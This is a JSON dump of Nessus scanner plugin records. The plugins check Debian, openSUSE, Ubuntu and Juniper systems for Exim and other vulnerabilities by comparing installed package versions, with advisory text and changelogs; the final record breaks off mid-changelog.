script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2016/03/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"exim4\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-base\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-config\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dbg\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dev\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"eximon4\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-base\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-config\", reference:\"4.84.2-1\")) flag++;\nif 
(deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dbg\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dev\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"eximon4\", reference:\"4.84.2-1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:36:05", "description": "This update to exim 4.86.2 fixes the following issues :\n\n - CVE-2016-1531: local privilege escalation for set-uid root exim when using 'perl_startup' (boo#968844)\n\nImportant: Exim now cleans the complete execution environment by default. This affects Exim and subprocesses such as transports calling other programs. The following new options are supported to adjust this behaviour :\n\n - keep_environment\n\n - add_environment A warning will be printed upon startup if none of these are configured.\n\nAlso includes upstream changes, improvements and bug fixes :\n\n - Support for using the system standard CA bundle.\n\n - New expansion items $config_file, $config_dir, containing the file and directory name of the main configuration file. 
Also $exim_version.\n\n - New 'malware=' support for Avast.\n\n - New 'spam=' variant option for Rspamd.\n\n - Assorted options on malware= and spam= scanners.\n\n - A commandline option to write a comment into the logfile.\n\n - A logging option for slow DNS lookups.\n\n - New $(env (<variable>)) expansion.\n\n - A non-SMTP authenticator using information from TLS client certificates.\n\n - Main option 'tls_eccurve' for selecting an Elliptic Curve for TLS.\n\n - Main option 'dns_trust_aa' for trusting your local nameserver at the same level as DNSSEC.", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "nessus", "title": "openSUSE Security Update : exim (openSUSE-2016-326)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim-debugsource", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-326.NASL", "href": "https://www.tenable.com/plugins/nessus/89909", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-326.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89909);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1531\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2016-326)\");\n script_summary(english:\"Check for the openSUSE-2016-326 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security 
update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to exim 4.86.2 fixes the following issues :\n\n - CVE-2016-1531: local privilege escalation for set-uid\n root exim when using 'perl_startup' (boo#968844)\n\nImportant: Exim now cleans the complete execution environment by\ndefault. This affects Exim and subprocesses such as transports calling\nother programs. The following new options are supported to adjust this\nbehaviour :\n\n - keep_environment\n\n - add_environment A warning will be printed upon startup\n if none of these are configured.\n\nAlso includes upstream changes, improvements and bug fixes :\n\n - Support for using the system standard CA bundle.\n\n - New expansion items $config_file, $config_dir,\n containing the file and directory name of the main\n configuration file. Also $exim_version.\n\n - New 'malware=' support for Avast.\n\n - New 'spam=' variant option for Rspamd.\n\n - Assorted options on malware= and spam= scanners.\n\n - A commandline option to write a comment into the\n logfile.\n\n - A logging option for slow DNS lookups.\n\n - New $(env (<variable>)) expansion.\n\n - A non-SMTP authenticator using information from TLS\n client certificates.\n\n - Main option 'tls_eccurve' for selecting an Elliptic\n Curve for TLS.\n\n - Main option 'dns_trust_aa' for trusting your local\n nameserver at the same level as DNSSEC.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968844\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"exim-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"exim-debuginfo-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"exim-debugsource-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"eximon-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"eximon-debuginfo-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"eximstats-html-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"exim-4.86.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"exim-debuginfo-4.86.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"exim-debugsource-4.86.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"eximon-4.86.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"eximon-debuginfo-4.86.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", 
reference:\"eximstats-html-4.86.2-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:36:13", "description": "It was discovered that Exim incorrectly filtered environment variables when used with the perl_startup configuration option. If the perl_startup option was enabled, a local attacker could use this issue to escalate their privileges to the root user. This issue has been fixed by having Exim clean the complete execution environment by default on startup, including any subprocesses such as transports that call other programs. This change in behaviour may break existing installations and can be adjusted by using two new configuration options, keep_environment and add_environment. (CVE-2016-1531)\n\nPatrick William discovered that Exim incorrectly expanded mathematical comparisons twice. A local attacker could possibly use this issue to perform arbitrary file operations as the Exim user. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-2972).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-16T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : Exim vulnerabilities (USN-2933-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2972", "CVE-2016-1531"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "p-cpe:/a:canonical:ubuntu_linux:exim4-dev", "p-cpe:/a:canonical:ubuntu_linux:eximon4", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:exim4", "p-cpe:/a:canonical:ubuntu_linux:exim4-base", "p-cpe:/a:canonical:ubuntu_linux:exim4-config"], "id": "UBUNTU_USN-2933-1.NASL", "href": "https://www.tenable.com/plugins/nessus/89962", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2933-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89962);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\"CVE-2014-2972\", \"CVE-2016-1531\");\n script_xref(name:\"USN\", value:\"2933-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : Exim vulnerabilities (USN-2933-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was discovered that Exim incorrectly filtered environment variables\nwhen used with the perl_startup configuration option. 
If the\nperl_startup option was enabled, a local attacker could use this issue\nto escalate their privileges to the root user. This issue has been\nfixed by having Exim clean the complete execution environment by\ndefault on startup, including any subprocesses such as transports that\ncall other programs. This change in behaviour may break existing\ninstallations and can be adjusted by using two new configuration\noptions, keep_environment and add_environment. (CVE-2016-1531)\n\nPatrick William discovered that Exim incorrectly expanded mathematical\ncomparisons twice. A local attacker could possibly use this issue to\nperform arbitrary file operations as the Exim user. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-2972).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-2933-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1531\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim \"perl_startup\" Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-config\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! 
('14.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'exim4', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'exim4-base', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'exim4-config', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'exim4-dev', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'eximon4', 'pkgver': '4.82-3ubuntu2.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'exim4 / exim4-base / exim4-config / exim4-daemon-heavy / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:02:30", "description": "According to its self-reported version number, the version of Junos Space running on the remote device is < 17.1R1, and is 
therefore affected by multiple vulnerabilities.", "cvss3": {}, "published": "2017-10-23T00:00:00", "type": "nessus", "title": "Juniper Junos Space < 17.1R1 Multiple Vulnerabilities (JSA10826)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1547", "CVE-2016-1548", "CVE-2016-1549", "CVE-2016-1550", "CVE-2016-1551", "CVE-2016-2516", "CVE-2016-2517", "CVE-2016-2518", "CVE-2016-2519", "CVE-2017-1000364", "CVE-2017-1000365", "CVE-2017-1000366", "CVE-2017-1000367", "CVE-2017-1000369", "CVE-2017-1000371", "CVE-2017-1000379", "CVE-2017-10612", "CVE-2017-10623", "CVE-2017-10624", "CVE-2017-7494"], "modified": "2023-03-30T00:00:00", "cpe": ["cpe:/a:juniper:junos_space"], "id": "JUNIPER_SPACE_JSA_10826.NASL", "href": "https://www.tenable.com/plugins/nessus/104100", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104100);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/30\");\n\n script_cve_id(\n \"CVE-2017-10612\",\n \"CVE-2017-10623\",\n \"CVE-2017-10624\",\n \"CVE-2017-7494\",\n \"CVE-2017-1000365\",\n \"CVE-2017-1000366\",\n \"CVE-2017-1000371\",\n \"CVE-2017-1000379\",\n \"CVE-2016-2516\",\n \"CVE-2017-1000367\",\n \"CVE-2016-1548\",\n \"CVE-2017-1000364\",\n \"CVE-2016-1547\",\n \"CVE-2016-1550\",\n \"CVE-2016-2518\",\n \"CVE-2016-2517\",\n \"CVE-2016-2519\",\n \"CVE-2016-1549\",\n \"CVE-2016-1551\",\n \"CVE-2017-1000369\"\n );\n script_bugtraq_id(101255, 101256);\n script_xref(name:\"JSA\", value:\"JSA10826\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/04/20\");\n\n script_name(english:\"Juniper Junos Space < 17.1R1 Multiple Vulnerabilities (JSA10826)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Junos\nSpace 
running on the remote device is < 17.1R1, and is therefore\naffected by multiple vulnerabilities.\");\n # https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10826&actp=METADATA\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d563772\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Junos Space version 17.1R1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_space\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright 
(C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Junos_Space/version\");\n\n exit(0);\n}\n\ninclude(\"junos.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit('Host/Junos_Space/version');\n\ncheck_junos_space(ver:ver, fix:'17.1R1', severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:28:10", "description": "This update for exim fixes the following issues :\n\nExim was updated to exim-4.94.2\n\nsecurity update (boo#1185631)\n\n - CVE-2020-28007: Link attack in Exim's log directory\n\n - CVE-2020-28008: Assorted attacks in Exim's spool directory\n\n - CVE-2020-28014: Arbitrary PID file creation\n\n - CVE-2020-28011: Heap buffer overflow in queue_run()\n\n - CVE-2020-28010: Heap out-of-bounds write in main()\n\n - CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n\n - CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n\n - CVE-2020-28015: New-line injection into spool header file (local)\n\n - CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n\n - CVE-2020-28009: Integer overflow in get_stdinput()\n\n - CVE-2020-28017: Integer overflow in receive_add_recipient()\n\n - CVE-2020-28020: Integer overflow in receive_msg()\n\n - CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n\n - CVE-2020-28021: New-line injection into spool header file (remote)\n\n - CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n\n - CVE-2020-28026: Line truncation and injection in spool_read_header()\n\n - CVE-2020-28019: Failure to reset function pointer after BDAT error\n\n - CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n\n - CVE-2020-28018: Use-after-free in tls-openssl.c\n\n - CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\nupdate to exim-4.94.1\n\n - Fix security issue in BDAT state confusion. 
Ensure we reset known-good where we know we need to not be reading BDAT data, as a general case fix, and move the places where we switch to BDAT mode until after various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n\n - Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n\n - Fix security issue with too many recipients on a message (to remove a known security problem if someone does set recipients_max to unlimited, or if local additions add to the recipient list). Fixes CVE-2020-RCPTL reported by Qualys.\n\n - Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in parse_fix_phrase()\n\n - Fix security issue CVE-2020-PFPSN and guard against cmdline invoker providing a particularly obnoxious sender full name.\n\n - Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n\n - Bug 1329: Fix format of Maildir-format filenames to match other mail- related applications. Previously an 'H' was used where available info says that 'M' should be, so change to match.\n\n - Bug 2587: Fix pam expansion condition. Tainted values are commonly used as arguments, so an implementation trying to copy these into a local buffer was taking a taint-enforcement trap. Fix by using dynamically created buffers.\n\n - Bug 2586: Fix listcount expansion operator. Using tainted arguments is reasonable, eg. to count headers.\n Fix by using dynamically created buffers rather than a local. Do similar fixes for ACL actions 'dcc', 'log_reject_target', 'malware' and 'spam'; the arguments are expanded so could be handling tainted values.\n\n - Bug 2590: Fix -bi (newaliases). A previous code rearrangement had broken the (no-op) support for this sendmail command. 
